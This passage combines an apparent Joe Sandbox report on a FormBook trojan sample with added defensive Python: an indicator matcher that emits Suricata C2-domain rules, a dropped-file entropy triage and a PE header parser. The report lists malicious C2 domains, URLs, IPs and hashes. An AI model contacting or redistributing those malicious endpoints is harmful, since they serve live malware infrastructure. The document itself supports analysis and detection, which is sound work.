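    for ip, domain, asn, _asn_name, malicious in table:
        if not malicious:
            continue
        domains[domain.lower()] = asn
        ips[ip] = asn
    return domains, ips


DOMAIN_IOCS, IP_IOCS = build_iocs(NETWORK_TABLE)


def suricata_dns_rules(domains, base_sid=9000001):
    """One DNS-query rule per domain; SIDs are an assumption, pick your own range."""
    rules = []
    for i, domain in enumerate(sorted(domains)):
        rules.append(
            f'alert dns $HOME_NET any -> any any (msg:"FormBook C2 domain {domain}"; '
            f'dns.query; content:"{domain}"; nocase; endswith; sid:{base_sid + i}; rev:1;)'
        )
    return rules


# Constructed log format: "<timestamp> <client> <qname> -> <answer>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) -> (\S+)$")


def classify(line):
    """Return (verdict, indicator): 'domain' (high), 'ip' (medium), 'ip-shared' (low), None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ("unparsed", None)
    _ts, _client, qname, answer = m.groups()
    qname = qname.rstrip(".").lower()
    if qname in DOMAIN_IOCS:
        return ("domain", qname)
    try:
        ipaddress.ip_address(answer)
    except ValueError:
        return (None, None)
    if answer in IP_IOCS:
        return ("ip-shared" if IP_IOCS[answer] in SHARED_INFRA_ASNS else "ip", answer)
    return (None, None)


# Constructed sample log (not from the report's PCAP).
SAMPLE_LOG = """\
2024-07-11T13:06:02Z 10.0.0.5 www.ffi07s.xyz. -> 188.114.97.3
2024-07-11T13:06:09Z 10.0.0.5 huayang.302.gn301.xyz. -> 154.222.238.52
2024-07-11T13:07:01Z 10.0.0.7 some-legit-site.example. -> 188.114.96.3
2024-07-11T13:07:30Z 10.0.0.7 ghs.googlehosted.com. -> 142.250.186.115
2024-07-11T13:08:00Z 10.0.0.9 other.example. -> 162.254.38.56
"""


def triage(log_text):
    """Return [(verdict, indicator)] for every parsable line that matched an indicator."""
    hits = []
    for line in log_text.splitlines():
        verdict, indicator = classify(line)
        if verdict and verdict != "unparsed":
            hits.append((verdict, indicator))
    return hits


if __name__ == "__main__":
    for verdict, indicator in triage(SAMPLE_LOG):
        print(f"{verdict:10s} {indicator}")
    print("\n".join(suricata_dns_rules(DOMAIN_IOCS)))
```

The third sample line is the case worth noticing: a benign-looking name resolving to 188.114.96.3 comes back as `ip-shared`, not as a confirmed hit, while the same address behind `www.globaltrend.xyz` would be a `domain` verdict.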
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1471496
                                    Start date and time:2024-07-11 15:03:58 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 9s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Electronic Order.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@13/8
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HCA Information:
                                    • Successful, ratio: 92%
                                    • Number of executed functions: 56
                                    • Number of non-executed functions: 276
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Electronic Order.exe
Time | Type | Description
09:06:01 | API Interceptor | 6358861x Sleep call for process: sfc.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | http://wolfmax4k.net | malicious | Phisher | wolfmax4k.net/
188.114.97.3 | Document.exe | malicious | FormBook | www.exporationgenius.sbs/x06k/
188.114.97.3 | IdEZn6s5ga.exe | malicious | Azorult, GuLoader | hqt3.shop/KL341/index.php
188.114.97.3 | msconfig.exe | malicious | Unknown | api.protonvpn.tw:8080/w
188.114.97.3 | run.vbs | malicious | Unknown | console.protonvpn.tw:8080/www
188.114.97.3 | 8tvMmyxveyzFcnJ.exe | malicious | FormBook | www.291van.fun/mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUh
188.114.97.3 | Packing List,BL & Final Invoice.xls | malicious | Lokibot | sini.la/c40mh
188.114.97.3 | HSOwUsZ7hs6Pm4m.exe | malicious | FormBook | www.artfulfusionhub.lat/qogc/
188.114.97.3 | j2vPH4wfF2YxEja.exe | malicious | FormBook | www.artfulfusionhub.lat/qogc/
188.114.97.3 | DY3AojqquRfcmp5.exe | malicious | FormBook | www.9muyiutyt.online/39t8/
188.114.96.3 | QUOTATION_JULQTRA071244úPDF.scr.exe | malicious | AgentTesla | filetransfer.io/data-package/TShfhWeB/download
188.114.96.3 | MBL- B-1440 Draft Invoice.exe | malicious | FormBook | www.bt36565.com/sp26/?4h6=/1KZa9AvaqhvDMXduF2ldNHr90z1HjMA2mpitHr9Qz+Cgg020DSQWr96reQsM+sinxEn&vR-XR=BDH8-8sp7L-l1
188.114.96.3 | 502407267 RUAG FOODPLAZA.exe | malicious | DarkTortilla, FormBook | www.91porn.makeup/vsp3/
188.114.96.3 | Purchase Order.exe | malicious | Lokibot | alphabetllc.top/alpha/five/fre.php
188.114.96.3 | msconfig2.exe | malicious | Unknown | image.protonvpn.tw:8080/w
188.114.96.3 | http://my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://microsoft.com@invstrategy.com/DocuSign.html | malicious | Unknown | my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://shareingdocuments.xyz/?befvctil
188.114.96.3 | a82WdwCQnQOQf4b.exe | malicious | FormBook | www.txglobedev.com/dy13/?Dxop-=UBZ4HNkXnx40rj&ETU4dv=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI
188.114.96.3 | HSOwUsZ7hs6Pm4m.exe | malicious | FormBook | www.9muyiutyt.online/39t8/
188.114.96.3 | j2vPH4wfF2YxEja.exe | malicious | FormBook | www.9muyiutyt.online/39t8/
188.114.96.3 | Sales Contract Document.bat.exe | malicious | FormBook | www.reignscents.com/45er/?Eb=7nIJSi4w4UDdAxj0bNOrDSFRryI6A1YsHs9hZ4wCm1ZqfM/zmtfDw2BRv7SKM2Ejw2h6&ohrPK2=Txo0d8
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context
huayang.302.gn301.xyz | Inquiry PR#27957.bat.exe | malicious | FormBook | 154.12.34.252
www.dtalusering.com | Inquiry PR#27957.bat.exe | malicious | FormBook | 103.42.108.46
www.dynamologistics.net | Inquiry PR#27957.bat.exe | malicious | FormBook | 35.212.86.52
weien.cdn.youziyuncdn.com | Inquiry PR#27957.bat.exe | malicious | FormBook | 134.122.138.60
www.ffi07s.xyz | Inquiry PR#27957.bat.exe | malicious | FormBook | 188.114.96.3
www.alphacentura.com | Inquiry PR#27957.bat.exe | malicious | FormBook | 188.114.96.3
www.globaltrend.xyz | Inquiry PR#27957.bat.exe | malicious | FormBook | 188.114.97.3
www.dospole.top | Inquiry PR#27957.bat.exe | malicious | FormBook | 162.254.38.56
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | Inquiry PR#27957.bat.exe | malicious | FormBook | 103.42.108.46
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | rCjg912Ssb.elf | malicious | Mirai | 103.252.154.25
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | PO Number 00127011.exe | malicious | FormBook | 110.232.143.110
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | https://members.stageschool.com.au/unsubscribe/ | malicious | Unknown | 110.232.143.111
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | QUOTATION – RFQ 000535.exe | malicious | FormBook | 110.232.143.110
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | COTAÇÃO – RFQ 000535.exe | malicious | FormBook | 110.232.143.110
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | ftrrrttyt.exe | malicious | FormBook | 110.232.143.110
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | RFQ2024563429876-9887877654.exe | malicious | FormBook | 110.232.143.110
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | file.exe | malicious | CMSBrute | 43.250.142.104
SYNERGYWHOLESALE-AP SYNERGY WHOLESALE PTY LTD (AU) | TC0931AC.exe | malicious | FormBook, PureLog Stealer | 103.42.108.46
CLOUDFLARENET (US) | https://c30wcrg676c.typeform.com/to/mw3jJ5Wv | malicious | Unknown | 104.19.229.21
CLOUDFLARENET (US) | https://nnetsasaxrsv.com/apart/057666761araspuchucho172 | malicious | Unknown | 188.114.96.3
CLOUDFLARENET (US) | vidar0907.exe | malicious | LummaC, Vidar | 188.114.97.3
CLOUDFLARENET (US) | https://www.staffingagencyphoenix.com/ | malicious | Unknown | 162.247.243.29
CLOUDFLARENET (US) | Phishing20240711.zip | malicious | Unknown | 1.1.1.1
CLOUDFLARENET (US) | softorganizer.exe | malicious | LummaC, Vidar | 188.114.96.3
CLOUDFLARENET (US) | lumma0907.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENET (US) | MT_056013785200.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENET (US) | https://www.serpro.gov.br/links-fixos-superiores/assinador-digital/assinador-serpro/arquivos/AssinadorSERPRO4.2.1.exe | malicious | Unknown | 1.1.1.1
CLOUDFLARENET (US) | https://premium.davidabostic.com | malicious | Unknown | 1.1.1.1
VPSQUAN (US) | qGf6yeA9wI.elf | malicious | Mirai | 69.165.74.76
VPSQUAN (US) | TOgpmvvWoj.exe | malicious | FormBook | 23.251.54.212
VPSQUAN (US) | Attendance list.exe | malicious | FormBook | 23.251.54.212
VPSQUAN (US) | AWB 112-17259653.exe | malicious | FormBook | 198.44.170.208
VPSQUAN (US) | Rn1AkuRExh.elf | malicious | Mirai | 103.252.20.91
VPSQUAN (US) | c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe | malicious | SystemBC | 198.44.190.49
VPSQUAN (US) | tpwinprn.dll | malicious | GhostRat | 156.235.99.47
VPSQUAN (US) | 6z70AuHrHI.dll | malicious | Unknown | 156.235.99.47
VPSQUAN (US) | PI No. LI-4325.scr.exe | malicious | FormBook | 156.235.111.63
VPSQUAN (US) | 2OdHcYtYOMOepjD.exe | malicious | FormBook | 23.251.54.212
                                    Process:C:\Windows\SysWOW64\sfc.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                    MD5:271D5F995996735B01672CF227C81C17
                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286208
                                    Entropy (8bit):7.99468258334443
                                    Encrypted:true
                                    SSDEEP:6144:h/SgBEFr2rkNagqfzb2vQ2IYfO49mC4VNkcF6Wdn+fF/FYJmC2u:h/VYNagUH2GYfOompVacFN+fdl1u
                                    MD5:225C61445560F7AE947612076F16BEFE
                                    SHA1:05738DC23D0ACC3670C14140EB0CD5DE65AED67F
                                    SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
                                    SHA-512:736419BD099B969EA58376B8B8003AD7BEC253B3199D0DC8CBF08ABF3CA68F6F734032011AE36EA884AD3D3C2A21E7E917E26B84E37E8A0FA81000F2C6B6687E
                                    Malicious:false
                                    Reputation:low
                                    Preview:.....4C73.._...}.OM...k4;...VYX04ADONBL4C73AXMVYX04ADONBL4.73AVR.WX.=.e.O...._Z2x=$6?BU,d,/,"[7.Q$x?#7xYZa...b!['R.LUGrYX04ADO7CE.~WT.e-1.ePS.^..vT$.)..j9?....r"+..^P)e-1.X04ADONB.qC7.@YM...j4ADONBL4.71@SL]YX|0ADONBL4C7.UXMVIX04!@ONB.4C'3AXOVY^04ADONBJ4C73AXMV9\04CDONBL4A7s.XMFYX 4ADO^BL$C73AXMFYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04Aj;+:84C7..\MVIX04.@ONRL4C73AXMVYX04AdON"L4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73A
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9866
                                    Entropy (8bit):7.613111027447556
                                    Encrypted:false
                                    SSDEEP:192:ZyaFcKrLMynw1R9GCkEWAsd0Zv3ORpcAMh5tdGg/cLrmpzDL3q:3F7rwynwdGCgdMejcvvzGg0Lik
                                    MD5:C191A6F72B4E281F72045B7DCDF883DE
                                    SHA1:0E0ABA7FEFAD86555DF2DFB05AB8F74BE2CA3B26
                                    SHA-256:40721C2BA62153542CD7B48F83135120CB9D098C7D9240BFCADED7C825A0EF11
                                    SHA-512:C052F68FEE5843FF6B9A0AF8067C50D962260E124999D19FA3E3CE0D384C9DC84B112D5F77A2875B5C2921C88D8613CF26D5931853FDD55B06130ADB34F18C87
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286208
                                    Entropy (8bit):7.99468258334443
                                    Encrypted:true
                                    SSDEEP:6144:h/SgBEFr2rkNagqfzb2vQ2IYfO49mC4VNkcF6Wdn+fF/FYJmC2u:h/VYNagUH2GYfOompVacFN+fdl1u
                                    MD5:225C61445560F7AE947612076F16BEFE
                                    SHA1:05738DC23D0ACC3670C14140EB0CD5DE65AED67F
                                    SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
                                    SHA-512:736419BD099B969EA58376B8B8003AD7BEC253B3199D0DC8CBF08ABF3CA68F6F734032011AE36EA884AD3D3C2A21E7E917E26B84E37E8A0FA81000F2C6B6687E
                                    Malicious:false
                                    Preview:.....4C73.._...}.OM...k4;...VYX04ADONBL4C73AXMVYX04ADONBL4.73AVR.WX.=.e.O...._Z2x=$6?BU,d,/,"[7.Q$x?#7xYZa...b!['R.LUGrYX04ADO7CE.~WT.e-1.ePS.^..vT$.)..j9?....r"+..^P)e-1.X04ADONB.qC7.@YM...j4ADONBL4.71@SL]YX|0ADONBL4C7.UXMVIX04!@ONB.4C'3AXOVY^04ADONBJ4C73AXMV9\04CDONBL4A7s.XMFYX 4ADO^BL$C73AXMFYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04Aj;+:84C7..\MVIX04.@ONRL4C73AXMVYX04AdON"L4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73A
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:ASCII text, with very long lines (28756), with no line terminators
                                    Category:dropped
                                    Size (bytes):28756
                                    Entropy (8bit):3.5967269015453844
                                    Encrypted:false
                                    SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Iw6lr4vfF3if6gyTm:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rv
                                    MD5:39C24DBDBFBA355CDC547B3E45A2CFA8
                                    SHA1:405BD40524D9CC1874C719D0E9FCE6FD435E4855
                                    SHA-256:A6F17294F35431EB741CED44D61ECF81FA57C450DC73BD7F1F09B8F27CE0993D
                                    SHA-512:66FB2B75169FB27418F50682C79EF1EDF059A13D6B125FBA0358CE21E347B3FE0F6BBA9ED8E815E620F365CF193BC7B038E3ADB93B7A3CD9500A97B3A5DB05EE
                                    Malicious:false
                                    Preview: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
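Added example, not part of the report: a small Python triage that parses dropped-file records in the Key:value form printed above (the text embedded in the script is copied from those records), collapses the two 286208-byte drops that share one SHA-256 into a single artifact, and ranks the rest by entropy. The Shannon entropy routine shows what the report's "Entropy (8bit)" column measures; the 7.5 threshold is an assumption, not a value the report uses.

```python
"""Dropped-file triage: parse the report's Key:value records, de-duplicate by hash,
flag high-entropy drops. Added example, not Joe Sandbox code."""
import math
from collections import Counter

# Copied from the dropped-file records above (only the fields this script reads).
RECORDS = r"""
Process:C:\Windows\SysWOW64\sfc.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Size (bytes):196608
Entropy (8bit):1.1239949490932863
Encrypted:false
SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
Process:C:\Users\user\Desktop\Electronic Order.exe
File Type:data
Size (bytes):286208
Entropy (8bit):7.99468258334443
Encrypted:true
SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
Process:C:\Users\user\Desktop\Electronic Order.exe
File Type:data
Size (bytes):9866
Entropy (8bit):7.613111027447556
Encrypted:false
SHA-256:40721C2BA62153542CD7B48F83135120CB9D098C7D9240BFCADED7C825A0EF11
Process:C:\Users\user\Desktop\Electronic Order.exe
File Type:data
Size (bytes):286208
Entropy (8bit):7.99468258334443
Encrypted:true
SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
Process:C:\Users\user\Desktop\Electronic Order.exe
File Type:ASCII text, with very long lines (28756), with no line terminators
Size (bytes):28756
Entropy (8bit):3.5967269015453844
Encrypted:false
SHA-256:A6F17294F35431EB741CED44D61ECF81FA57C450DC73BD7F1F09B8F27CE0993D
"""


def parse_records(text):
    """Each 'Process:' line starts a record; later Key:value lines fill it in."""
    records, cur = [], None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")   # first colon only: values contain 'C:\'
        key, value = key.strip(), value.strip()
        if key == "Process":
            cur = {"process": value}
            records.append(cur)
        elif cur is None:
            continue
        elif key == "File Type":
            cur["file_type"] = value
        elif key == "Size (bytes)":
            cur["size"] = int(value)
        elif key == "Entropy (8bit)":
            cur["entropy"] = float(value)
        elif key == "Encrypted":
            cur["encrypted"] = value.lower() == "true"
        elif key == "SHA-256":
            cur["sha256"] = value.lower()
    return records


def unique_by_sha256(records):
    """Keep the first record per hash; identical drops under different paths are one artifact."""
    seen, out = set(), []
    for r in records:
        if r["sha256"] not in seen:
            seen.add(r["sha256"])
            out.append(r)
    return out


def high_entropy(records, threshold=7.5):
    """Unique drops whose reported entropy reaches the threshold (assumed value 7.5)."""
    return [r for r in unique_by_sha256(records) if r["entropy"] >= threshold]


def shannon_entropy(data):
    """Bits per byte, 0.0 for uniform content up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    recs = parse_records(RECORDS)
    print(f"{len(recs)} records, {len(unique_by_sha256(recs))} unique by SHA-256")
    for r in high_entropy(recs):
        print(f"{r['sha256'][:16]}  {r['size']:>7} B  entropy {r['entropy']:.2f}  encrypted={r['encrypted']}")
```

The 9866-byte drop scores 7.61 yet the report does not mark it encrypted; compressed data lands in the same band, so the entropy column is a prioritisation signal, not proof of encryption.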
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.163132836165658
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Electronic Order.exe
                                    File size:1'205'760 bytes
                                    MD5:f44d956aa3a0c41f8e8ca7d9e9ead69c
                                    SHA1:5d4cd96731237a1d8a8e03aa078b0bda9d2296a3
                                    SHA256:48bae1515ac732f33a6fbd725dfb29fe55132b1f446f0efa201c1ad10cf0b1f6
                                    SHA512:e61d7c0a4e9fe6ef74b9dcbd76c3b526af3931485cbdc4e04bf7e19077b5050eabda611b712b8f4189716236b1bab3f27c07ccd259a4bb721e77b43747c51df4
                                    SSDEEP:24576:+AHnh+eWsN3skA4RV1Hom2KXMmHas5PNdmnDIZO2/wUcl5:ph+ZkldoPK8Yas51dmni/wUO
                                    TLSH:B245BE0273D1C036FFAB92739B6AB64596BC79254133852F13981DB9BD701B2223E763
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                    Icon Hash:aaf3e3e3938382a0
                                    Entrypoint:0x42800a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x668F14E2 [Wed Jul 10 23:10:26 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
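Added example, not Joe Sandbox code: the Python below decodes the static header fields the report lists (link timestamp, entry point, image base, OS and subsystem version, file and DLL characteristics) using only the standard library. It does not read the sample; it builds a header-only PE32 image in memory carrying the values printed above and parses that, so the same parser can later be pointed at a real file. The flag tables contain the characteristics the PE format defines; the constructed header has no sections and is not loadable.

```python
"""Minimal PE32 header decoder for the fields a triage report prints.
Added example, not Joe Sandbox code. The header it parses is constructed from the report's values."""
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def _flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32_header(data):
    """Return the header fields of a PE32 (32-bit) image; raises ValueError on anything else."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptHdr, Characteristics
    _machine, _nsec, stamp, _, _, _opt_size, file_chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint (RVA)
    imagebase = struct.unpack_from("<I", data, opt + 28)[0]      # ImageBase
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entrypoint": entry,
        "imagebase": imagebase,
        "os_version": (os_major, os_minor),
        "subsystem": SUBSYSTEMS.get(subsystem, subsystem),
        "file_characteristics": _flags(file_chars, FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
        "aslr": bool(dll_chars & 0x0040),
        "nx_compat": bool(dll_chars & 0x0100),
    }


def build_pe32_header(entry, imagebase, stamp, file_chars, dll_chars, os_version=(5, 1), subsystem=2):
    """Constructed header-only PE32 image (no sections, not loadable) used to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew -> right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, stamp, 0, 0, 96, file_chars)   # 0x14C = i386
    opt = bytearray(96)                                           # PE32 standard + Windows fields, no directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<I", opt, 28, imagebase)
    struct.pack_into("<HH", opt, 40, *os_version)                 # OS version
    struct.pack_into("<HH", opt, 48, *os_version)                 # subsystem version
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def reported_header():
    """Header built from the values in the report's static PE section above."""
    img = build_pe32_header(
        entry=0x42800A, imagebase=0x400000, stamp=0x668F14E2,
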